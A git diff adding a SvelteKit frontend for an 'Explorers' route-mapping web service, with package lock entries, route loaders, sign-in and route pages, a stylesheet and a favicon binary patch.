"@ampproject/remapping": "^2.2.1", + "@jridgewell/sourcemap-codec": "^1.4.15", + "@jridgewell/trace-mapping": "^0.3.18", + "acorn": "^8.9.0", + "aria-query": "^5.3.0", + "axobject-query": "^3.2.1", + "code-red": "^1.0.3", + "css-tree": "^2.3.1", + "estree-walker": "^3.0.3", + "is-reference": "^3.0.1", + "locate-character": "^3.0.0", + "magic-string": "^0.30.4", + "periscopic": "^3.1.0" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/svelte-check": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/svelte-check/-/svelte-check-3.6.0.tgz", + "integrity": "sha512-8VfqhfuRJ1sKW+o8isH2kPi0RhjXH1nNsIbCFGyoUHG+ZxVxHYRKcb+S8eaL/1tyj3VGvWYx3Y5+oCUsJgnzcw==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.17", + "chokidar": "^3.4.1", + "fast-glob": "^3.2.7", + "import-fresh": "^3.2.1", + "picocolors": "^1.0.0", + "sade": "^1.7.4", + "svelte-preprocess": "^5.1.0", + "typescript": "^5.0.3" + }, + "bin": { + "svelte-check": "bin/svelte-check" + }, + "peerDependencies": { + "svelte": "^3.55.0 || ^4.0.0-next.0 || ^4.0.0 || ^5.0.0-next.0" + } + }, + "node_modules/svelte-hmr": { + "version": "0.15.3", + "resolved": "https://registry.npmjs.org/svelte-hmr/-/svelte-hmr-0.15.3.tgz", + "integrity": "sha512-41snaPswvSf8TJUhlkoJBekRrABDXDMdpNpT2tfHIv4JuhgvHqLMhEPGtaQn0BmbNSTkuz2Ed20DF2eHw0SmBQ==", + "engines": { + "node": "^12.20 || ^14.13.1 || >= 16" + }, + "peerDependencies": { + "svelte": "^3.19.0 || ^4.0.0" + } + }, + "node_modules/svelte-ionicons": { + "version": "0.7.2", + "resolved": "https://registry.npmjs.org/svelte-ionicons/-/svelte-ionicons-0.7.2.tgz", + "integrity": "sha512-soICqtqQ6kSBwly3oOyVaoB6ajmgWSMR8tsEKl3sts3lCknFAH7/4F5eT5lnNZW2v2c+SC1y6nk304tHJaWAmA==", + "dev": true, + "peerDependencies": { + "svelte": "^3.54.0 || ^4.0.0" + } + }, + "node_modules/svelte-preprocess": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/svelte-preprocess/-/svelte-preprocess-5.1.1.tgz", + "integrity": "sha512-p/Dp4hmrBW5mrCCq29lEMFpIJT2FZsRlouxEc5qpbOmXRbaFs7clLs8oKPwD3xCFyZfv1bIhvOzpQkhMEVQdMw==", + "dev": true, + "hasInstallScript": true, + "dependencies": { + "@types/pug": "^2.0.6", + "detect-indent": "^6.1.0", + "magic-string": "^0.27.0", + "sorcery": "^0.11.0", + "strip-indent": "^3.0.0" + }, + "engines": { + "node": ">= 14.10.0" + }, + "peerDependencies": { + "@babel/core": "^7.10.2", + "coffeescript": "^2.5.1", + "less": "^3.11.3 || ^4.0.0", + "postcss": "^7 || ^8", + "postcss-load-config": "^2.1.0 || ^3.0.0 || ^4.0.0", + "pug": "^3.0.0", + "sass": "^1.26.8", + "stylus": "^0.55.0", + "sugarss": "^2.0.0 || ^3.0.0 || ^4.0.0", + "svelte": "^3.23.0 || ^4.0.0-next.0 || ^4.0.0 || ^5.0.0-next.0", + "typescript": ">=3.9.5 || ^4.0.0 || ^5.0.0" + }, + "peerDependenciesMeta": { + "@babel/core": { + "optional": true + }, + "coffeescript": { + "optional": true + }, + "less": { + "optional": true + }, + "postcss": { + "optional": true + }, + "postcss-load-config": { + "optional": true + }, + "pug": { + "optional": true + }, + "sass": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "typescript": { + "optional": true + } + } + }, + "node_modules/svelte-preprocess/node_modules/magic-string": { + "version": "0.27.0", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.27.0.tgz", + "integrity": "sha512-8UnnX2PeRAPZuN12svgR9j7M1uWMovg/CEnIwIG0LFkXSJJe4PdfUGiTGl8V9bsBHFUtfVINcSyYxd7q+kx9fA==", + "dev": true, + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.4.13" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/tiny-glob": { + "version": "0.2.9", + "resolved": "https://registry.npmjs.org/tiny-glob/-/tiny-glob-0.2.9.tgz", + "integrity": "sha512-g/55ssRPUjShh+xkfx9UPDXqhckHEsHr4Vd9zX55oSdGZc/MD0m3sferOkwWtp98bv+kcVfEHtRJgBVJzelrzg==", + "dependencies": { + "globalyzer": "0.1.0", + "globrex": "^0.1.2" + } + }, + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, + "dependencies": { + "is-number": "^7.0.0" + }, + "engines": { + "node": ">=8.0" + } + }, + "node_modules/totalist": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/totalist/-/totalist-3.0.1.tgz", + "integrity": "sha512-sf4i37nQ2LBx4m3wB74y+ubopq6W/dIzXg0FDGjsYnZHVa1Da8FH853wlL2gtUhg+xJXjfk3kUZS3BRoQeoQBQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/typescript": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.2.tgz", + "integrity": "sha512-6l+RyNy7oAHDfxC4FzSJcz9vnjTKxrLpDG5M2Vu4SHRVNg6xzqZp6LYSR9zjqQTu8DU/f5xwxUdADOkbrIX2gQ==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.26.5.tgz", + "integrity": "sha512-cSb4bPFd5qgR7qr2jYAi0hlX9n5YKK2ONKkLFkxl+v/9BvC0sOpZjBHDBSXc5lWAf5ty9oZdRXytBIHzgUcerw==", + "dependencies": { + "@fastify/busboy": "^2.0.0" + }, + "engines": { + "node": ">=14.0" + } + }, + "node_modules/update-browserslist-db": { + "version": "1.0.13", + "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz", + "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "dependencies": { + "escalade": "^3.1.1", + "picocolors": "^1.0.0" + }, + "bin": { + "update-browserslist-db": "cli.js" + }, + "peerDependencies": { + "browserslist": ">= 4.21.0" + } + }, + "node_modules/vite": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/vite/-/vite-4.5.0.tgz", + "integrity": "sha512-ulr8rNLA6rkyFAlVWw2q5YJ91v098AFQ2R0PRFwPzREXOUJQPtFUG0t+/ZikhaOCDqFoDhN6/v8Sq0o4araFAw==", + "dependencies": { + "esbuild": "^0.18.10", + "postcss": "^8.4.27", + "rollup": "^3.27.1" + }, + "bin": { + "vite": "bin/vite.js" + }, + "engines": { + "node": "^14.18.0 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/vitejs/vite?sponsor=1" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + }, + "peerDependencies": { + "@types/node": ">= 14", + "less": "*", + "lightningcss": "^1.21.0", + "sass": "*", + "stylus": "*", + "sugarss": "*", + "terser": "^5.4.0" + }, + "peerDependenciesMeta": { + "@types/node": { + "optional": true + }, + "less": { + "optional": true + }, + "lightningcss": { + "optional": true + }, + "sass": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "terser": { + "optional": true + } + } + }, + "node_modules/vitefu": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/vitefu/-/vitefu-0.2.5.tgz", + "integrity": "sha512-SgHtMLoqaeeGnd2evZ849ZbACbnwQCIwRH57t18FxcXoZop0uQu0uzlIhJBlF/eWVzuce0sHeqPcDo+evVcg8Q==", + "peerDependencies": { + "vite": "^3.0.0 || ^4.0.0 || ^5.0.0" + }, + "peerDependenciesMeta": { + "vite": { + "optional": true + } + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true + }, + "node_modules/yaml": { + "version": "2.3.4", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.4.tgz", + "integrity": "sha512-8aAvwVUSHpfEqTQ4w/KMlf3HcRdt50E5ODIQJBw1fQ5RL34xabzxtUlzTXVqc4rkZsPbvrXKWnABCD7kWSmocA==", + "dev": true, + "optional": true, + "peer": true, + "engines": { + "node": ">= 14" + } + } + } +} diff --git a/internal/explorers-front/package.json b/internal/explorers-front/package.json new file mode 100644 index 0000000..4ef9c6e --- /dev/null +++ b/internal/explorers-front/package.json @@ -0,0 +1,30 @@ +{ + "name": "explorers-front", + "version": "0.0.1", + "scripts": { + "dev": "vite dev", + "build": "vite build", + "preview": "vite preview", + "check": "svelte-kit sync && svelte-check --tsconfig ./jsconfig.json", + "check:watch": "svelte-kit sync && svelte-check --tsconfig ./jsconfig.json --watch" + }, + "devDependencies": { + "@fontsource/fira-mono": "^4.5.10", + "@neoconfetti/svelte": "^1.0.0", + "@sveltejs/adapter-auto": "^2.0.0", + "@sveltejs/kit": "^1.27.4", + "@types/cookie": "^0.5.1", + "autoprefixer": "^10.4.16", + "svelte": "^4.0.5", + "svelte-check": "^3.6.0", + "svelte-ionicons": "^0.7.2", + "typescript": "^5.0.0", + "vite": "^4.4.2" + }, + "type": "module", + "dependencies": { + "@sveltejs/adapter-static": "^2.0.3", + "bulma": "^0.9.4", + "leaflet": "^1.9.4" + } +} diff --git a/internal/explorers-front/src/app.d.ts b/internal/explorers-front/src/app.d.ts new file mode 100644 index 0000000..f59b884 --- /dev/null +++ b/internal/explorers-front/src/app.d.ts @@ -0,0 +1,12 @@ +// See https://kit.svelte.dev/docs/types#app +// for information about these interfaces +declare global { + namespace App { + // interface Error {} + // interface Locals {} + // interface PageData {} + // interface Platform {} + } +} + +export {}; diff --git a/internal/explorers-front/src/app.html b/internal/explorers-front/src/app.html new file mode 100644 index 0000000..77a5ff5 --- /dev/null +++ b/internal/explorers-front/src/app.html @@ -0,0 +1,12 @@ + + + + + + + %sveltekit.head% + + +
%sveltekit.body%
+ + diff --git a/internal/explorers-front/src/routes/+layout.js b/internal/explorers-front/src/routes/+layout.js new file mode 100644 index 0000000..b71827c --- /dev/null +++ b/internal/explorers-front/src/routes/+layout.js @@ -0,0 +1,20 @@ +/** @type {import('./$types').PageLoad} */ +import { PUBLIC_BASE_URL } from '$env/static/public'; +export const ssr = false; + +export async function load({ fetch }) { + const res = await fetch(`${PUBLIC_BASE_URL}/user`, { + credentials: 'include' + }); + let user = null; + try { + if (res.ok) { + user = await res.json(); + } + } + catch (err) { + user = null; + } + + return { user: user }; +} \ No newline at end of file diff --git a/internal/explorers-front/src/routes/+layout.svelte b/internal/explorers-front/src/routes/+layout.svelte new file mode 100644 index 0000000..552c59a --- /dev/null +++ b/internal/explorers-front/src/routes/+layout.svelte @@ -0,0 +1,43 @@ + + + + + +
+ + +
diff --git a/internal/explorers-front/src/routes/+page.js b/internal/explorers-front/src/routes/+page.js new file mode 100644 index 0000000..a27376a --- /dev/null +++ b/internal/explorers-front/src/routes/+page.js @@ -0,0 +1,7 @@ +import {PUBLIC_BASE_URL} from '$env/static/public'; + +export async function load({fetch, parent }) { + const {user} = await parent(); + + return {}; +} \ No newline at end of file diff --git a/internal/explorers-front/src/routes/+page.svelte b/internal/explorers-front/src/routes/+page.svelte new file mode 100644 index 0000000..6657b9e --- /dev/null +++ b/internal/explorers-front/src/routes/+page.svelte @@ -0,0 +1,94 @@ + +{#if error} +

{error}

+{/if} +
+
+
+ + {#if user} +

Welcome back, {user.username}!

+ {:else} +

Welcome to the "Explorers" service!

+ {/if} +
+
+
+{#if user} +
+
+
+ +
+
+ +
+{:else} +
+ +
+
+
+
+

Ready to start?

+
+
+ +
+{/if} \ No newline at end of file diff --git a/internal/explorers-front/src/routes/RouteList.svelte b/internal/explorers-front/src/routes/RouteList.svelte new file mode 100644 index 0000000..534e0c8 --- /dev/null +++ b/internal/explorers-front/src/routes/RouteList.svelte @@ -0,0 +1,22 @@ + +
+ world +

Routes created by you:

+
+ {#each routes as route} +

{route.title}

+ {/each} +
+ +
diff --git a/internal/explorers-front/src/routes/components/Map.svelte b/internal/explorers-front/src/routes/components/Map.svelte new file mode 100644 index 0000000..d5be6e3 --- /dev/null +++ b/internal/explorers-front/src/routes/components/Map.svelte @@ -0,0 +1,134 @@ + + + +
\ No newline at end of file diff --git a/internal/explorers-front/src/routes/components/MarkerPopup.svelte b/internal/explorers-front/src/routes/components/MarkerPopup.svelte new file mode 100644 index 0000000..4bd164d --- /dev/null +++ b/internal/explorers-front/src/routes/components/MarkerPopup.svelte @@ -0,0 +1,55 @@ + + + +
+ {#if editable} + +
+ Title: + + Description: + + Comment: + +
+ {:else } +
+

{title}

+

{desc}

+

{comment}

+
+ {/if} + +
+ diff --git a/internal/explorers-front/src/routes/create/+page.svelte b/internal/explorers-front/src/routes/create/+page.svelte new file mode 100644 index 0000000..e89a8a1 --- /dev/null +++ b/internal/explorers-front/src/routes/create/+page.svelte @@ -0,0 +1,80 @@ + +
+ {#if error} +
+
+ {error} +
+
+ {/if} +
+
+
+
+ +

Create a new route

+
+
+
+
+
+
+

+ + + + +

+
+
+ +
+
+

+ +

+
+
+
+
+
\ No newline at end of file diff --git a/internal/explorers-front/src/routes/logout/+page.svelte b/internal/explorers-front/src/routes/logout/+page.svelte new file mode 100644 index 0000000..cba8eb5 --- /dev/null +++ b/internal/explorers-front/src/routes/logout/+page.svelte @@ -0,0 +1,26 @@ + + + \ No newline at end of file diff --git a/internal/explorers-front/src/routes/route/[slug]/+page.js b/internal/explorers-front/src/routes/route/[slug]/+page.js new file mode 100644 index 0000000..a4cf94c --- /dev/null +++ b/internal/explorers-front/src/routes/route/[slug]/+page.js @@ -0,0 +1,28 @@ +import {PUBLIC_BASE_URL} from '$env/static/public'; + +export async function load({fetch, parent, params, url}) { + const {user} = await parent(); + + let slug = params.slug; + let shareToken = url.searchParams.get('token'); + let routeURL = `${PUBLIC_BASE_URL}/route/${slug}` + (shareToken ? `?token=${shareToken}` : ''); + + let res = await fetch(routeURL, { + credentials: 'include' + }); + + if (res.ok) { + let route = await res.json(); + return {route: route, error: null}; + } + + let error = await res.text(); + try { + error = await res.json().detail.error; + } catch (e) { + // ignore. + } + + + return {route: {}, error: error}; +} \ No newline at end of file diff --git a/internal/explorers-front/src/routes/route/[slug]/+page.svelte b/internal/explorers-front/src/routes/route/[slug]/+page.svelte new file mode 100644 index 0000000..32f7d25 --- /dev/null +++ b/internal/explorers-front/src/routes/route/[slug]/+page.svelte @@ -0,0 +1,132 @@ + + +{#if error} +
+ {error} +
+{/if} +
+
+ +
+ + {#if canEdit} +
+
+ Share +
+
+ {/if} + +
+
+
+
+ +
+
+ {#if canEdit} +
+
+
+ +
+
+
+
+
+ +
+
+
+
+ +
+
+ {/if} +
diff --git a/internal/explorers-front/src/routes/signin/+page.svelte b/internal/explorers-front/src/routes/signin/+page.svelte new file mode 100644 index 0000000..88a8d52 --- /dev/null +++ b/internal/explorers-front/src/routes/signin/+page.svelte @@ -0,0 +1,84 @@ + +
+ {#if error} +
+
+ {error} +
+
+ {/if} +
+
+
+
+

Let's signin.

+
+
+
+
+
+
+

+ + + + +

+
+
+

+ + + + +

+
+
+

+ +

+
+
+
+
+
\ No newline at end of file diff --git a/internal/explorers-front/src/routes/signup/+page.svelte b/internal/explorers-front/src/routes/signup/+page.svelte new file mode 100644 index 0000000..a0dc22f --- /dev/null +++ b/internal/explorers-front/src/routes/signup/+page.svelte @@ -0,0 +1,84 @@ + +
+ {#if error} +
+
+ {error} +
+
+ {/if} +
+
+
+
+

Let's signup.

+
+
+
+
+
+
+

+ + + + +

+
+
+

+ + + + +

+
+
+

+ +

+
+
+
+
+
\ No newline at end of file diff --git a/internal/explorers-front/src/routes/styles.css b/internal/explorers-front/src/routes/styles.css new file mode 100644 index 0000000..1441d94 --- /dev/null +++ b/internal/explorers-front/src/routes/styles.css @@ -0,0 +1,107 @@ +@import '@fontsource/fira-mono'; + +:root { + --font-body: Arial, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, + Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif; + --font-mono: 'Fira Mono', monospace; + --color-bg-0: rgb(202, 216, 228); + --color-bg-1: hsl(209, 36%, 86%); + --color-bg-2: hsl(224, 44%, 95%); + --color-theme-1: #ff3e00; + --color-theme-2: #4075a6; + --color-text: rgba(0, 0, 0, 0.7); + --column-width: 42rem; + --column-margin-top: 4rem; + font-family: var(--font-body); + color: var(--color-text); +} + +body { + min-height: 100vh; + margin: 0; + background-attachment: fixed; + background-color: var(--color-bg-1); + background-size: 100vw 100vh; + background-image: radial-gradient( + 50% 50% at 50% 50%, + rgba(255, 255, 255, 0.75) 0%, + rgba(255, 255, 255, 0) 100% + ), + linear-gradient(180deg, var(--color-bg-0) 0%, var(--color-bg-1) 15%, var(--color-bg-2) 50%); +} + +h1, +h2, +p { + font-weight: 400; +} + +p { + line-height: 1.5; +} + +a { + color: var(--color-theme-1); + text-decoration: none; +} + +a:hover { + text-decoration: underline; +} + +h1 { + font-size: 2rem; + text-align: center; +} + +h2 { + font-size: 1rem; +} + +pre { + font-size: 16px; + font-family: var(--font-mono); + background-color: rgba(255, 255, 255, 0.45); + border-radius: 3px; + box-shadow: 2px 2px 6px rgb(255 255 255 / 25%); + padding: 0.5em; + overflow-x: auto; + color: var(--color-text); +} + +.text-column { + display: flex; + max-width: 48rem; + flex: 0.6; + flex-direction: column; + justify-content: center; + margin: 0 auto; +} + +input, +button { + font-size: inherit; + font-family: inherit; +} + +button:focus:not(:focus-visible) { + outline: none; +} + +@media (min-width: 720px) { + h1 { + font-size: 2.4rem; + } +} + +.visually-hidden { + border: 0; + clip: rect(0 0 0 0); + height: auto; + margin: 0; + overflow: hidden; + padding: 0; + position: absolute; + width: 1px; + white-space: nowrap; +} diff --git a/internal/explorers-front/static/favicon.png b/internal/explorers-front/static/favicon.png new file mode 100644 index 0000000000000000000000000000000000000000..0c63270815273db9053781a6fb78f107bc1c80ed GIT binary patch literal 9167 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 